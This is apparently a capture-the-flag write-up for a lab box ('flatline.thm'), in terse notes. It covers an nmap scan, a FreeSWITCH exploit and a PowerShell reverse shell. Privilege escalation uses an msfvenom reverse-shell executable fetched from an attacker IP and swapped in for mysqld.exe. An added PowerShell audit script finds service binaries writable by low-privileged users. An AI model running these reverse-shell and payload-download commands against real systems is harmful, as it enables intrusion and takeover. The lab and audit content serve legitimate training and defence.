nmap
nmap -sV -p- -Pn -T4 flatline.thm
Port 3389
3389/tcp open ms-wbt-server Microsoft Terminal Services
Certificate
I'm searching on Google, but there is nothing interesting.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp
Port 8021
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Google:
https://www.exploit-db.com/exploits/47799
The exploit gives nothing, but it says Authenticated.
So I decided to execute a reverse shell.
https://www.revshells.com/
With the PowerShell #3 (Base64)
First flag
C:\Users\Nekrotic\Desktop
OpenClinic
Interesting
https://www.exploit-db.com/exploits/50448
Create the malicious exe file
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4242 -f exe > mysqld_evil.exe
Download it
Invoke-WebRequest -Uri "http://10.8.50.167:8000/mysqld_evil.exe" -OutFile "mysqld_evil.exe"
Rename it
Rename-Item mysqld.exe mysqld.exe.old
Rename-Item mysqld_evil.exe mysqld.exe
Reboot
Listen first, then reboot.
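
The rename-and-reboot steps above only work when a low-privileged user can write to a binary, or the folder holding it, that Windows starts with higher privileges at boot. The following audit script is an added example, not part of the original write-up; it assumes the binary runs as a Windows service and an English-language system (group names are localized), and the function names are hypothetical:

```powershell
# Added example: report services whose binary, or its folder, grants
# write-type rights to a low-privileged group. Run from an elevated prompt.
# Assumption: English group names; adjust $lowPriv on localized systems.
$lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
$risky = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

function Get-ServiceBinaryPath([string]$PathName) {
    # PathName is either "C:\quoted path\svc.exe" args or C:\path\svc.exe args
    $expanded = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($expanded -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($expanded -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $null
}

function Get-LowPrivWriteAce([string]$Path) {
    # Allow ACEs that apply to $Path itself and give a listed group write-type rights
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        ([int]$_.PropagationFlags -band [int]$inheritOnly) -eq 0 -and
        ([int]$_.FileSystemRights -band [int]$risky) -ne 0
    }
}

Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe) { return }
    # Check the binary and its parent folder: either one allows the swap
    foreach ($target in @($exe, (Split-Path -Parent $exe))) {
        foreach ($ace in @(Get-LowPrivWriteAce $target)) {
            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName
                Target   = $target
                Identity = $ace.IdentityReference.Value
                Rights   = $ace.FileSystemRights
            }
        }
    }
} | Sort-Object Service, Target | Format-Table -AutoSize -Wrap
```

Any row where RunsAs is LocalSystem or another privileged account is a finding; the fix is to remove the write-type ACE from the binary and its folder.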